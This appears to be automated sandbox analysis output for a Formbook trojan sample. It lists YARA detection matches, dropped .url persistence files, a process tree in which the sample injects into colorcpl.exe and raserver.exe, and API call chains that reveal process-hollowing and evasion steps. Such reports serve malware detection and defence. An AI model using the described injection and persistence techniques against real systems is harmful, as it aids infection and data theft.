          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.498815518.0000000005140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.309972284.0000000004A7F000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.525904098.0000000010410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.553544992.0000000000C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.545995933.00000000046FE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.495768965.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: 0321423605241625.exe PID: 3140, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: colorcpl.exe PID: 3576, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: Mwqrxeuz.exe PID: 5528, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: raserver.exe PID: 5928, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Users\Public\Libraries\zuexrqwM.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 06E1B150 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174C24 appears 471 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02176908 appears 32 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 021748A0 appears 60 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: String function: 02174A98 appears 136 times
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02189128 InetIsOffline,InetIsOffline,CopyFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,0_2_02189128
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183690 LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,0_2_02183690
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218779C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,0_2_0218779C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218C0D9 Sleep,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,DeleteFileA,WinExec,Sleep,OpenProcess,NtSuspendThread,InetIsOffline,ZwClose,InetIsOffline,InetIsOffline,ExitProcess,0_2_0218C0D9
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218368E LoadLibraryA,GetModuleHandleA,GetProcAddress,RtlMoveMemory,GetCurrentProcess,NtFlushVirtualMemory,FreeLibrary,0_2_0218368E
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218773C InetIsOffline,VirtualAlloc,GetProcAddress,FreeLibrary,VirtualFree,VirtualAllocEx,GetProcAddress,FreeLibrary,WriteProcessMemory,NtProtectVirtualMemory,0_2_0218773C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02183990 InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,0_2_02183990
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218398E InetIsOffline,CreateProcessA,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,GetProcAddress,FreeLibrary,NtProtectVirtualMemory,SetThreadContext,NtResumeThread,0_2_0218398E
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_06E596E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_06E59660
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59FE0 NtCreateMutant,LdrInitializeThunk,1_2_06E59FE0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E597A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_06E597A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59780 NtMapViewOfSection,LdrInitializeThunk,1_2_06E59780
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59710 NtQueryInformationToken,LdrInitializeThunk,1_2_06E59710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595D0 NtClose,LdrInitializeThunk,1_2_06E595D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59540 NtReadFile,LdrInitializeThunk,1_2_06E59540
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A50 NtCreateFile,LdrInitializeThunk,1_2_06E59A50
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A20 NtResumeThread,LdrInitializeThunk,1_2_06E59A20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_06E59A00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_06E598F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59860 NtQuerySystemInformation,LdrInitializeThunk,1_2_06E59860
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59840 NtDelayExecution,LdrInitializeThunk,1_2_06E59840
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599A0 NtCreateSection,LdrInitializeThunk,1_2_06E599A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_06E59910
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E596D0 NtCreateKey,1_2_06E596D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59670 NtQueryInformationProcess,1_2_06E59670
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59650 NtQueryValueKey,1_2_06E59650
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59610 NtEnumerateValueKey,1_2_06E59610
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59760 NtOpenProcess,1_2_06E59760
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A770 NtOpenThread,1_2_06E5A770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59770 NtSetInformationFile,1_2_06E59770
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59730 NtQueryVirtualMemory,1_2_06E59730
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A710 NtOpenProcessToken,1_2_06E5A710
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E595F0 NtQueryInformationFile,1_2_06E595F0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59560 NtWriteFile,1_2_06E59560
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59520 NtWaitForSingleObject,1_2_06E59520
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5AD30 NtSetContextThread,1_2_06E5AD30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A80 NtOpenDirectoryObject,1_2_06E59A80
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59A10 NtQuerySection,1_2_06E59A10
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5A3B0 NtGetContextThread,1_2_06E5A3B0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59B00 NtSetValueKey,1_2_06E59B00
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E598A0 NtWriteVirtualMemory,1_2_06E598A0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E5B040 NtSuspendThread,1_2_06E5B040
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59820 NtEnumerateKey,1_2_06E59820
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E599D0 NtCreateProcessEx,1_2_06E599D0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 1_2_06E59950 NtQueueApcThread,1_2_06E59950
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess Stats: CPU usage > 98%
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dll
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeSection loaded: amtahoo.dllJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exe Section loaded: amtahoo.dll
          Source: 0321423605241625.exeReversingLabs: Detection: 35%
          Source: 0321423605241625.exeVirustotal: Detection: 40%
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Users\user\Desktop\0321423605241625.exeJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\0321423605241625.exe C:\Users\user\Desktop\0321423605241625.exe
          Source: C:\Users\user\Desktop\0321423605241625.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Mwqrxeuz.exe "C:\Users\Public\Libraries\Mwqrxeuz.exe"
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\colorcpl.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0321423605241625.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FMJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@11/5@8/1
          Source: C:\Windows\explorer.exeFile read: C:\Users\Public\Libraries\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217823C GetDiskFreeSpaceA,0_2_0217823C
          Source: C:\Users\user\Desktop\0321423605241625.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Mwqrxeuz.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185770 CreateToolhelp32Snapshot,0_2_02185770
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1412:120:WilError_01
          Source: C:\Users\user\Desktop\0321423605241625.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
          Source: Binary string: colorcpl.pdbGCTL source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: raserver.exe, 00000009.00000002.556117926.0000000005257000.00000004.10000000.00040000.00000000.sdmp, raserver.exe, 00000009.00000002.553458668.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000001.00000003.306684881.000000000503F000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000003.308280419.00000000051D9000.00000004.00000800.00020000.00000000.sdmp, colorcpl.exe, 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.493545986.00000000049ED000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.553968858.0000000004D20000.00000040.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000003.499251021.0000000004B8C000.00000004.00000800.00020000.00000000.sdmp, raserver.exe, 00000009.00000002.554941231.0000000004E3F000.00000040.00000800.00020000.00000000.sdmp

          Data Obfuscation

          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.2170000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.0321423605241625.exe.3baeed8.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.308860487.0000000003BAE000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.308375056.00000000021D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F2A4 push 0218F310h; ret 0_2_0218F308
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F0AC push 0218F125h; ret 0_2_0218F11D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F144 push 0218F1ECh; ret 0_2_0218F1E4
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0218F1F8 push 0218F288h; ret 0_2_0218F280
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02190667 pushad ; ret 0_2_0219068D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217C718 push ecx; mov dword ptr [esp], edx0_2_0217C71D
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_0217D78C push 0217D7B8h; ret 0_2_0217D7B0
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_02185488 push 021854F2h; ret 0_2_021854EA
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021844AC push 021844EEh; ret 0_2_021844E6
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FB push 02188554h; ret 0_2_0218854C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021884FC push 02188554h; ret 0_2_0218854C
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A8 push 02183653h; ret 0_2_0218364B
          Source: C:\Users\user\Desktop\0321423605241625.exeCode function: 0_2_021835A6 push 02183653h; ret 0_2_0218364B
